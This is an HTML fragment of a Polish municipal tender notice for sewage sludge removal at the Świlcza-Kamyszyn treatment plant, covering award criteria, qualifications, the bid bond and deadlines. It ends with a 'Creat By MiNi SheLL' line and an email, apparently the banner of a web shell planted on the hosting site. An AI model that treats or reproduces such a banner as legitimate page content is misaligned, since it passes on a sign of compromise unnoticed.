opcji.<br/>W przypadku skorzystania z prawa opcji, które oprócz zwiększenia ilości odbieranych<br/>i zagospodarowanych odpadów zakładać będzie także wydłużenie terminu realizacji<br/>umowy, Zamawiający przekaże Wykonawcy oświadczenie, o którym mowa w zd. 1<br/>najpóźniej 21 dni przed zakończeniem realizacji umowy obejmującej zakres podstawowy<br/>zamówienia.<br/>6) Wykorzystanie przez Zamawiającego prawa opcji nie wymaga sporządzania aneksu do<br/>umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">14.	Informacja o przewidywanych zamówieniach, o których mowa w art. 214 ust. 1 pkt 7 ustawy<br/>Pzp.<br/>1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 7 ustawy Pzp, zgodnych z przedmiotem zamówienia podstawowego i polegających na<br/>powtórzeniu usług związanych z odbiorem, transportem i zagospodarowaniem komunalnych osadów ściekowych z oczyszczalni ścieków Świlcza-Kamyszyn w wysokości 100 000 zł,<br/>2)	Zamówienie udzielone zostanie w trybie zamówienia z wolnej ręki zgodnie z warunkami<br/>zamówienia podstawowego. Zamówienie zostanie udzielone w jednym lub kilku<br/>zamówieniach w przypadku gdy wystąpi taka potrzeba oraz gdy Zamawiający będzie posiadał<br/>środki finansowe na jego realizację.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Transport komunalnych osadów ściekowych więcej niż jednym pojazdem przystosowanym do wywozu komunalnych osadów ściekowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>a)	w przypadku odzysku osadów, polegającego na stosowaniu komunalnych osadów ściekowych przez Wykonawcę na podstawie art. 96 ust. 1 pkt 1-3 ustawy o odpadach (t.j. Dz. U. z 2021 roku, poz. 779):<br/>	Wykonawca musi posiadać wpis do bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO w zakresie transportu,<br/>	w przypadku podwykonawstwa w zakresie transportu osadów, podwykonawca zobowiązany jest posiadać stosowna koncesję na świadczenie usług transportowych oraz wpis do Bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO,<br/>b)	w przypadku odzysku osadów, polegającego na stosowaniu komunalnych osadów ściekowych przez Wykonawcę na podstawie art. 96 ust. 1 pkt 4-5 ustawy o odpadach:<br/>	Wykonawca musi posiadać wpis do bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO: w zakresie transportu oraz odzysku lub unieszkodliwienia osadów,<br/>	posiadać stosowną decyzję na odzysk lub unieszkodliwienie osadów ściekowych oraz inne niezbędne dokumenty związane ze stosowaniem osadów do rekultywacji terenów, przy dostosowaniu gruntów do określonych potrzeb wynikających z planów gospodarki odpadami, planów zagospodarowania przestrzennego lub decyzji o warunkach zabudowy,<br/>c)	w przypadku zagospodarowania osadów innego niż stosowanie komunalnych osadów ściekowych na podstawie art. 96 ustawy o odpadach:<br/>	wykonawca musi posiadać wpis do bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO: w zakresie transportu oraz odzysku lub unieszkodliwienia osadów,<br/>	posiadać stosowną decyzję na odzysk lub unieszkodliwienie osadów ściekowych.<br/>2) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>a)	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie, wykonał należycie co najmniej jedno zamówienie, którego przedmiotem była realizacja usługi polegającej na odbiorze, wywozie i zagospodarowaniu komunalnych osadów ściekowych z oczyszczalni ścieków w ilości nie mniejszej niż 2 000 ton w okresie nie dłuższym niż 12 miesięcy (Zamawiający dopuszcza sumowanie usług z różnych kontraktów w celu uzyskania ilości nie mniejszej niż 2 000 ton przy założeniu, że wykazane kontrakty (najwcześniejszy i najpóźniejszy) były wykonane w odległości czasowej nie dłuższej niż 12 miesięcy) obejmującą rodzaj procesu odzysku komunalnych osadów ściekowych taki sam jak wskazany w formularzu ofertowym,<br/>b)	dysponuje co najmniej 1 pojazdem przystosowanym do wywozu komunalnych osadów ściekowych. Pojazd ten powinien posiadać szczelne skrzynie ładunkowe o ładowności min. 25 Mg oraz zabezpieczenie, które zapobiegnie wydostaniu się ładunku poza pojazd w czasie transportu. <br/>Wykonawcy wspólnie ubiegający się o zamówienie muszą wykazać, że warunek udziału w postępowaniu jak wyżej – spełnia jeden z wykonawców samodzielnie lub łącznie (kumulatywnie) wszyscy/ kilku wykonawców wchodzących w skład grupy wykonawców wspólnie ubiegających się o zamówienie.<br/>W odniesieniu do warunków dotyczących doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5, 6, 7 Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1)	w przypadku odzysku osadów, polegającego na stosowaniu komunalnych osadów ściekowych przez Wykonawcę na podstawie art. 96 ust. 1 pkt 1-3 ustawy o odpadach (t. j. Dz. U. z 2021 r., poz. 779):<br/>a)	zaświadczenie o nadaniu numeru rejestrowego z bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO w zakresie odzysku odpadów w przypadku rolników, będących wytwórcami odpadów gospodarujących na powierzchni użytków rolnych co najmniej 75 ha oraz w zakresie transportu osadów ściekowych,<br/>2)	w przypadku odzysku osadów, polegającego na stosowaniu komunalnych osadów ściekowych przez Wykonawcę na podstawie art. 96 ust. 1 pkt 4-5 ustawy o odpadach (t. . Dz. U. z 2021 r., poz. 779):<br/>a)	zaświadczenie o nadaniu numeru rejestrowego z bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO: w zakresie transportu oraz odzysku lub unieszkodliwienia osadów,<br/>b)	decyzja na odzysk lub unieszkodliwienie osadów ściekowych oraz innych niezbędnych dokumentów do stosowania osadów do rekultywacji terenów, przy dostosowaniu gruntów do określonych potrzeb wynikających z planów gospodarki odpadami, planów zagospodarowania przestrzennego lub decyzji o warunkach zabudowy,<br/>3)	w przypadku zagospodarowania osadów innego niż stosowanie komunalnych osadów ściekowych na podstawie art. 96 ustawy o odpadach (t.j. Dz. U. z 2021 r., poz. 779):<br/>a)	zaświadczenie o nadaniu numeru rejestrowego z bazy danych o produktach i opakowaniach oraz o gospodarce odpadami – BDO: w zakresie transportu oraz odzysku lub unieszkodliwienia osadów,<br/>b)	decyzja na odzysk lub unieszkodliwienie osadów ściekowych.<br/>4)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>5)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy<br/>w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (wzór wykazu zostanie przekazany wykonawcy, którego oferta została najwyżej oceniona);<br/>6)	w odniesieniu do warunków dotyczących doświadczenia (rozdz. IX SWZ) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w zdaniu poprzedzającym, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika które roboty wykonają poszczególni wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Określono w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium. Wykonawca jest zobowiązany do wniesienia wadium <br/>w wysokości: 3 000,00 zł (słownie: trzy tysiące złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu; <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto Banku Spółdzielczego w Głogowie Młp. Oddział w Świlczy nr rachunku 50 9159 1023 2005 5000 1821 0001 z dopiskiem: „Wadium - nr postępowania ZWiK 37/03/2022”.<br/> UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p. <br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Zakład Wodociągów i Kanalizacji w Świlczy<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty w postaci elektronicznej.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie o niepodleganiu wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te wstępnie potwierdzają spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszczalna jest zmiana niniejszej umowy w przypadku gdy:<br/>1) zmianie ulegnie nazwa i/lub siedziba którejkolwiek ze stron,<br/>2) zmianie ulegnie termin wykonania umowy, ewentualnie wstrzymanie / wznowienie usługi ze<br/>względu na zmiany stanu prawnego lub gdy wystąpiły okoliczności uniemożliwiające wykonanie<br/>przedmiotu umowy, np. działania sił natury uznane za stan klęski żywiołowej, powodzie, itp.,<br/>3) zmianie ulegnie wynagrodzenie Wykonawcy w związku z odebraniem przez Wykonawcę<br/>mniejszej ilości komunalnych osadów ściekowych niż podana szacunkowa ilość,<br/>4) zmianie ulegnie w trakcie wykonywania przedmiotu zamówienia stawka podatku od towarów i<br/>usług VAT, a w konsekwencji zmiany podwyższeniu lub obniżeniu ulegnie kwota wynagrodzenia<br/>ryczałtowego ogółem brutto wynikająca z umowy,<br/>5) zmianie ulegną w trakcie realizacji usługi przepisy dotyczące zasad naliczania podatku VAT<br/>dla usług lub inne przepisy mające wpływ na sposób realizacji umowy.<br/>2. Wszelkie zmiany niniejszej umowy wymagają zachowania formy pisemnej pod rygorem<br/>nieważności. Dopuszcza się zmianę niniejszej umowy z przyczyn innych niż wymienione w ust.<br/>1 za zgodną wolą stron. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami należy złożyć za pośrednictwem platformy pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-17 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty.<br/>2.	Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1, jeżeli w postępowaniu o udzielenie zamówienia prowadzonym w trybie	podstawowym złożono tylko jedną ofertę.<br/>3.	Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie zobowiązany przed podpisaniem umowy do wniesienia zabezpieczenia należytego wykonania umowy (jeżeli jego wniesienie było wymagane) w wysokości i formie określonej w Rozdziale XX SWZ.<br/>4.	Jeżeli Wykonawca nie złoży w/w dokumentu zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie Wykonawcy.<br/>5.	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>6.	Wykonawca zobowiązany jest posiadać przez cały okres realizacji umowy ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o sumie ubezpieczenia nie mniejszej niż 200 000,00 zł. Koszty ubezpieczenia ponosi Wykonawca. Umowa ubezpieczenia od odpowiedzialności cywilnej winna mieć charakter ciągły i obejmować ochroną ubezpieczeniową cały okres realizacji przedmiotu umowy. Dopuszcza się składanie kilku umów ubezpieczeniowych od odpowiedzialności cywilnej w zakresie prowadzonej działalności następujących po sobie i spełniających warunki, o których mowa w zdaniu pierwszym i drugim. Przed przystąpieniem do realizacji usługi Wykonawca zobowiązany jest doręczyć Zamawiającemu odpis polisy ubezpieczeniowej potwierdzającej zawarcie umowy ubezpieczenia, o której mowa w zdaniu pierwszym wraz z ogólnymi warunkami ubezpieczeń (jeśli Zamawiający nie posiada niniejszych dokumentów przez przystąpieniem do realizacji umowy). Nadto, na żądanie Zamawiającego, Wykonawca zobowiązany jest okazywać Zamawiającemu dowody uiszczenia składek ubezpieczeniowych. W przypadku uchybienia przez Wykonawcę niniejszemu obowiązkowi Zamawiający uprawniony jest do zawarcia stosownej umowy ubezpieczenia na koszt Wykonawcy, w tym obciążenia go kosztami składek. Wykonawca zobowiązany jest pokryć należności Zamawiającego z powyższego tytułu niezwłocznie, nie później niż w terminie 14 dni od dnia doręczenia Wykonawcy stosownego wezwania, a jeżeli nie pokryje należności w tym terminie, to wówczas Zamawiający pomniejszy wypłatę należności z wystawionej przez Wykonawcę faktury o należność z tytułu zawarcia stosownej umowy ubezpieczenia. <br/>7.	Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com